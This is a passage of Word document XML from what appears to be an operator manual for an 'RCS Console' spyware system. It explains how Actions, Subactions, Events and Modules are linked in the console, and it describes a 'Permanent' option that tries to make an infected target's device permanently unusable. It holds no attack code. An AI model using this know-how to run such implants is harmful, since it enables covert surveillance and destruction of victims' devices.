          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FB39EA" w:rsidRPr="00145C50" w:rsidRDefault="00FB39EA" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FB39EA" w:rsidRPr="00145C50" w:rsidRDefault="00FB39EA" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FB39EA" w:rsidRPr="00145C50" w:rsidRDefault="00FB39EA" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is the Action’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRPr="0029750F" w:rsidRDefault="00145C50" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002954E4" w:rsidRPr="00145C50" w:rsidRDefault="002954E4" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subactions</w:t>
            </w:r>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a list of Actions that you want to execute - one by one - in the specified order.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00145C50" w:rsidRPr="0029750F" w:rsidRDefault="00145C50" w:rsidP="00145C50">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FB39EA" w:rsidRPr="00145C50" w:rsidRDefault="00F62F13" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Permanent</w:t>
            </w:r>
            <w:r w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00711085" w:rsidRPr="00145C50">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allows the Agent to try to make the infected Target’s device permanently unusable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001F2BD2" w:rsidRDefault="001F2BD2" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF3E89" w:rsidRDefault="00BF3E89" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF3E89" w:rsidRDefault="00BF3E89" w:rsidP="00785BC7">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF3E89" w:rsidRDefault="00BF3E89">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="00CF6B8C" w:rsidP="00CF6B8C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The interaction</w:t>
      </w:r>
      <w:r w:rsidR="00444FB9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between Actions and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Events</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00444FB9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> done through the connection points “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enable events</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” and “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disable events</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="008577AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="008577AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“Enable events”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00444FB9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00444FB9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is represented by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a green arrow</w:t>
      </w:r>
      <w:r w:rsidR="00444FB9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="008577AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00157989">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disable</w:t>
      </w:r>
      <w:r w:rsidR="008577AA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> events”</w:t>
      </w:r>
      <w:r w:rsidR="00444FB9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection is represented by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> a red arrow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="00CF6B8C" w:rsidP="00CF6B8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CF6B8C" w:rsidRPr="004B1CEA" w:rsidTr="00F04B48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="008438CE" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BE220FC" wp14:editId="2D186E77">
                  <wp:extent cx="1619250" cy="2428875"/>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19250" cy="2428875"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="00CF6B8C" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="008438CE" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D529C15" wp14:editId="053A84BC">
                  <wp:extent cx="1619250" cy="2428875"/>
                  <wp:effectExtent l="0" t="0" r="0"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19250" cy="2428875"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidTr="00F04B48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF6B8C" w:rsidRPr="00057420" w:rsidRDefault="00CF6B8C" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="008438CE" w:rsidRDefault="0010013A" w:rsidP="008438CE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.20</w:t>
            </w:r>
            <w:r w:rsidR="008438CE">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008438CE" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="008438CE">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CF6B8C" w:rsidRDefault="008438CE" w:rsidP="008438CE">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8438CE" w:rsidRPr="008438CE" w:rsidRDefault="008438CE" w:rsidP="008438CE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ENABLE EVENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="00CF6B8C" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF6B8C" w:rsidRPr="00057420" w:rsidRDefault="00CF6B8C" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD0F35" w:rsidRDefault="0010013A" w:rsidP="00BD0F35">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.21</w:t>
            </w:r>
            <w:r w:rsidR="00BD0F35">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD0F35" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00BD0F35">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008438CE" w:rsidRDefault="008438CE" w:rsidP="008438CE">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CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="008438CE" w:rsidP="008438CE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DISABLE EVENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001D326B" w:rsidRDefault="001D326B" w:rsidP="00BD0F35">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001D326B" w:rsidRDefault="001D326B" w:rsidP="00BD0F35">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD0F35" w:rsidRPr="004B1CEA" w:rsidRDefault="00BD0F35" w:rsidP="00BD0F35">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The interaction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between Actions and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Modules</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> done through the connection points “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>” and “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stop</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1CEA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The “Start” connection is represented by a green arrow. The “Stop” connection is represented by a red arrow.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="00CF6B8C" w:rsidP="00CF6B8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CF6B8C" w:rsidRPr="004B1CEA" w:rsidTr="00F04B48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="00CF6B8C" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B1CEA">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3102CF21" wp14:editId="53D0EC9E">
                  <wp:extent cx="2083570" cy="22572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083570" cy="2257200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="00CF6B8C" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="00CF6B8C" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B1CEA">
              <w:rPr>
                <w:noProof/>
                <w:lang w:eastAsia="it-IT"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11125C1E" wp14:editId="0864A1E6">
                  <wp:extent cx="2083569" cy="22572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83569" cy="2257200"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidTr="00F04B48">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4673" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF6B8C" w:rsidRPr="00057420" w:rsidRDefault="00CF6B8C" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD0F35" w:rsidRDefault="0010013A" w:rsidP="00BD0F35">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.22</w:t>
            </w:r>
            <w:r w:rsidR="00BD0F35">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD0F35" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00BD0F35">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008438CE" w:rsidRDefault="008438CE" w:rsidP="008438CE">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CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="008438CE" w:rsidP="008438CE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>START MODULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="00CF6B8C" w:rsidP="00F04B48">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4671" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CF6B8C" w:rsidRPr="00057420" w:rsidRDefault="00CF6B8C" w:rsidP="00F04B48">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00BD0F35" w:rsidRDefault="0010013A" w:rsidP="00BD0F35">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.23</w:t>
            </w:r>
            <w:r w:rsidR="00BD0F35">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00BD0F35" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00BD0F35">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS Console ]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008438CE" w:rsidRDefault="008438CE" w:rsidP="008438CE">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CF6B8C" w:rsidRPr="004B1CEA" w:rsidRDefault="008438CE" w:rsidP="008438CE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>STOP MODULE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00785BC7" w:rsidRDefault="00785BC7" w:rsidP="005E4792">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
